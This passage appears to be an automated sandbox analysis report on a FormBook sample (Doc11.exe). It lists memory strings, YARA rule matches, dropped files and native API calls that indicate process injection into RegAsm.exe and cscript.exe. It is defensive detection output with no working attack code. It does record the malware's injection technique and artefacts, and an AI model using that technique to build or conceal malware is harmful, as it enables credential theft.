          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\cscript.exeDropped file: C:\Users\user\AppData\Roaming\7L8580B-\7L8logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\cscript.exeDropped file: C:\Users\user\AppData\Roaming\7L8580B-\7L8logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Doc11.exeCode function: 0_2_05001C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtTerminateProcess,NtUnmapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread,
          Source: C:\Users\user\Desktop\Doc11.exeCode function: 0_2_050000AD NtOpenSection,NtMapViewOfSection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00419CA0 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00419D50 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00419DD0 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00419E80 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00419C9A NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00419D4A NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00419DCC NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00419E7A NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031698F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031697A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0316A3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169A80 NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031699D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0316B040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031698A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0316A710 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0316A770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169FE0 NtCreateMutant,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169670 NtQueryInformationProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031696D0 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0316AD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03169560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C295D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29560 NtWriteFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C296D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29610 NtEnumerateValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29770 NtSetInformationFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29B00 NtSetValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C295F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C2AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C297A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C2A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C2A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C298F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C298A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C2B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C299D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C29A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C2A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B19CA0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B19DD0 NtClose,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B19D50 NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B19E80 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B19C9A NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B19DCC NtClose,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B19D4A NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B19E7A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Doc11.exeCode function: 0_2_009D4A58
          Source: C:\Users\user\Desktop\Doc11.exeCode function: 0_2_009D5B80
          Source: C:\Users\user\Desktop\Doc11.exeCode function: 0_2_009D4A48
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E98F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041DA6C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E539
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409E1B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409E20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041DFA4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031F2B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0315EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031E03DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031EDBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031DFA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031F22AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0312F900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03144120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031E1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031FE824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0313B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031520A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031F20A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031F28EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031FDFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031F1FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031ED616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03146E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031F2EF7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031F2D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03120D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031F1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03152581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031F25DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0313D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0313841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_031ED466
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04BF841F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04CAD466
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04CB25DD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C12581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04BFD5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04BE0D20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04CB1D55
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04CB2D07
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04CB2EF7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04CAD616
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C06E30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04CBDFCE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04CB1FF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04CB28EC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04BFB090
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C120A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04CB20A8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04CA1002
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04CBE824
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04BEF900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C04120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04CB22AE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C9FA2B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04CA03DA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04CADBD2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C1EBB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04CB2B28
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B02D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B09E20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B09E1B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B02FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B1DFA4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0312B150 appears 45 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04BEB150 appears 45 times
          Source: Doc11.exe, 00000000.00000002.196411457.0000000005D60000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePGzTmRHSQnoDrXlf.bounce.exe4 vs Doc11.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
          Source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
